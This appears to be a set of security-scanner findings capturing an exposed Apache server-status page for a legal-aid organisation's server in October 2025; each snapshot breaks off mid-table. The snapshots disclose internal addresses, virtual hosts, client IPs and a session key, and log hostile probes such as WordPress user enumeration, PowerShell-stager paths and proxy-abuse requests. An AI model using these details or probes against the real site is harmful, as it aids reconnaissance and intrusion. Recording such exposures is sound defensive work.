HTTP/1.0 31-553-0/0/53030. 0.0055822500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82700990700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00708130500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15697942500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0669977256620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23699772500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00708134000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00708133800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32699772510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00708133900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00708133700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00708133600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00708133500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00708133400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00708133300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001167367200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001167367100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001167367000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001167366900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001167366800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001167366700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001167366600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001167366500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001167366400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001167366300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02121f61f77
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 21-Oct-2025 03:22:49 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 560 Parent Server MPM Generation: 559 Server uptime: 559 days 10 hours 28 minutes 16 seconds Server load: 0.00 0.00 0.00 Total accesses: 13732537 - Total Traffic: 194.7 GB CPU Usage: u350.6 s30.25 cu0 cs0 - .000788% CPU load .284 requests/sec - 4325 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ..__._.__W._._.__............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-559-0/0/810192. 9.442285300.00.0013391.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-559-0/0/787308. 13.312287900.00.0012996.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-559220690/28/755540_ 3.08166900.01.2712841.38 20.12.240.188http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-559220740/42/737725_ 5.49172700.02.0412319.88 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-559-0/0/718382. 1.282285100.00.0011806.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-559211280/76/697861_ 6.32104400.01.9611500.06 130.176.137.70http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 6-559-0/0/658525. 14.93228522510.00.0010820.75 130.176.209.171http/1.1atlantalegalaid.org:8080GET /themes.php HTTP/1.1 7-559249800/47/633565_ 3.77166900.01.1710325.07 20.12.240.188http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 8-559249810/57/601664_ 11.37233500.01.259746.14 134.122.43.60http/1.1atlantalegalaid.org:8080GET /download/powershell/ HTTP/1.1 9-5592151025/99/581773W 12.380027.93.789147.86 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-559-0/0/513035. 9.132285500.00.008705.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-559217750/130/477654_ 11.02916110.02.747868.31 130.176.187.246http/1.1elearning.alas.org:8080POST /lib/ajax/service.php?sesskey=6t5a5GxJBE&info=core_fetch_n 12-559-0/0/414040. 3.332284900.00.006542.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-559249900/120/328020_ 6.38233500.02.064767.70 134.122.43.60http/1.1atlantalegalaid.org:8080GET /get.php HTTP/1.1 14-559-0/0/289023. 0.232285000.00.004290.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-559249960/17/264714_ 2.14132300.00.693761.53 162.243.172.170http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 16-559249970/48/230104_ 1.29105000.01.603422.78 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 17-558-0/0/167252. 0.0013123300.00.002320.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-558-0/0/145237. 0.0013123200.00.002056.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-558-0/0/137485. 0.0013123100.00.002099.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-553-0/0/128161. 0.0054786000.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0654777800.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0054785900.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0054785600.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0054785800.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0054785700.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0054797200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0054797100.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0054797000.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0054796800.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0054796900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0054796700.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82699964900.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00707104700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15696916700.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0669874676620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23698746700.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00707108200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00707108000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32698746710080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00707108100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00707107900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00707107800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00707107700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00707107600.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00707107500.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001166341400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001166341300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001166341200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001166341100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001166341000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001166340900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001166340800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001166340700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001166340600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001166340500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02178fc156e
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 19-Oct-2025 10:10:42 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 559 Parent Server MPM Generation: 558 Server uptime: 557 days 17 hours 16 minutes 9 seconds Server load: 0.00 0.00 0.00 Total accesses: 13730678 - Total Traffic: 194.7 GB CPU Usage: u281.83 s23.8 cu0 cs0 - .000634% CPU load .285 requests/sec - 4337 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ___._..__W__._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-558133130/16/810085_ 3.1345300.00.9813388.42 64.23.240.13http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 1-558133160/19/787200_ 3.68285800.01.1112990.30 64.62.197.219http/1.1atlantalegalaid.org:8080GET http://api.ipify.org/?format=json HTTP/1.1 2-558139220/11/755368_ 1.913022650.00.5912837.32 206.168.34.126http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 3-558-0/0/737661. 1.61620400.00.0012316.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-558134880/15/718288_ 2.79284200.00.8511801.68 64.62.197.212http/1.1atlantalegalaid.org:8080GET /geoserver/web/ HTTP/1.1 5-558-0/0/697751. 2.70620500.00.0011496.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-558-0/0/658410. 0.85620800.00.0010816.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-558134980/15/633299_ 2.8629700.00.7910307.92 206.168.34.126http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 8-558135030/13/601539_ 2.3029600.00.729741.45 206.168.34.126http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 9-5581350825/39/581658W 2.940027.90.839143.78 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-558135130/47/512943_ 1.9330300.00.638702.18 206.168.34.126http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-558139320/4/477455_ 0.6545300.00.207864.00 64.23.240.13http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-558-0/0/414012. 3.73620700.00.006541.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-558139370/5/327832_ 0.76291900.00.204763.13 64.62.197.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-558-0/0/289018. 0.44620600.00.004289.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-556-0/0/264695. 0.62999401410.00.003760.83 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 16-556-0/0/230055. 0.0011360000.00.003421.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-555-0/0/167251. 6.7723619800.00.002320.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-553-0/0/145236. 0.0039953400.00.002056.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-553-0/0/137484. 0.0039953300.00.002099.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-553-0/0/128161. 0.0039953200.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0639945000.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0039953100.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0039952800.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0039953000.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0039952900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0039964500.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0039964400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0039964300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0039964100.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0039964200.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0039964000.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82685132200.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00692272000.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15682084000.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0668391406620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23683914000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00692275500.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00692275300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32683914010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00692275400.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00692275200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00692275100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00692275000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00692274900.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00692274800.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001151508600.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001151508500.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001151508400.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001151508300.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001151508200.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001151508100.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001151508000.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001151507900.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001151507800.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001151507700.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001151507600.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021080afffe
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 18-Oct-2025 18:33:09 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 558 Parent Server MPM Generation: 557 Server uptime: 557 days 1 hour 38 minutes 35 seconds Server load: 0.00 0.00 0.00 Total accesses: 13729623 - Total Traffic: 194.6 GB CPU Usage: u484.35 s44.09 cu0 cs0 - .0011% CPU load .285 requests/sec - 4341 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ___W_.__.__._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-55758130/46/809955_ 19.09520100.02.9213384.61 45.142.193.27http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-55759660/67/787102_ 40.83551900.04.4912986.66 3.172.90.70http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 2-55760870/75/755300_ 24.5412702450.02.6212833.72 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-557609425/67/737614W 24.830028.02.7212315.08 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 4-55760990/60/718237_ 13.21208600.01.2911799.27 18.68.45.176http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 5-557-0/0/697668. 3.661957100.00.0011493.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-55758300/56/658295_ 27.12394700.03.6810814.36 3.172.90.70http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 7-55776320/8/633193_ 4.5612886460.00.3810303.97 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 8-557-0/0/601526. 26.831957000.00.009740.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-55758190/112/581579_ 36.5712752420.04.749141.24 130.176.137.139http/1.1gwinnettfamilylawclinic.org:808GET /@vite/env HTTP/1.1 10-55776370/14/512761_ 8.01477180.00.738696.50 18.68.45.176http/1.1elearning.alas.org:8080GET /user/profile.php?id=87 HTTP/1.1 11-556-0/0/477450. 0.005734800.00.007863.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-55758240/45/413943_ 24.173573130.02.276539.57 130.176.137.70http/1.1elearning.alas.org:8080GET /course/view.php?id=11 HTTP/1.1 13-556-0/0/327826. 1.67436861490.00.004762.93 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-556-0/0/289015. 0.005734700.00.004289.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-556-0/0/264695. 0.62436861410.00.003760.83 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 16-556-0/0/230055. 0.005734600.00.003421.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-555-0/0/167251. 6.7717994500.00.002320.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-553-0/0/145236. 0.0034328100.00.002056.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-553-0/0/137484. 0.0034328000.00.002099.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-553-0/0/128161. 0.0034327900.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0634319700.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0034327800.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0034327500.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0034327700.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0034327600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0034339100.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0034339000.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0034338900.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0034338700.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0034338800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0034338600.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82679506900.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00686646600.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15676458700.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0667828866620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23678288600.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00686650100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00686649900.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32678288610080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00686650000.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00686649800.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00686649700.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00686649600.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00686649500.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00686649400.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001145883300.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001145883200.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001145883100.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001145883000.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001145882900.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001145882800.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001145882700.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001145882600.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001145882500.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001145882400.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021745fd214
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 17-Oct-2025 08:52:20 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 557 Parent Server MPM Generation: 556 Server uptime: 555 days 15 hours 57 minutes 46 seconds Server load: 0.00 0.00 0.00 Total accesses: 13728533 - Total Traffic: 194.6 GB CPU Usage: u296.23 s25.08 cu0 cs0 - .000669% CPU load .286 requests/sec - 4351 B/second - 14.9 kB/request 2 requests currently being processed, 5 idle workers KW___....._..._................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-556303351/3/809868K 0.05201.10.0113380.05 70.132.1.90http/1.1short.alas.org:8080GET /swagger/index.html HTTP/1.1 1-5563018224/28/787001W 0.050026.80.0412981.21 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-556301930/3/755185_ 0.00184200.00.0012829.41 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-556304670/1/737524_ 0.00281400.00.0012311.33 66.132.153.141http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 4-556301880/38/718148_ 0.09280900.00.0811796.53 66.132.153.141http/1.1atlantalegalaid.org:8080GET /wiki HTTP/1.1 5-555-0/0/697635. 0.463163400.00.0011492.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-555-0/0/658214. 2.0588373150.00.0010809.56 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET / 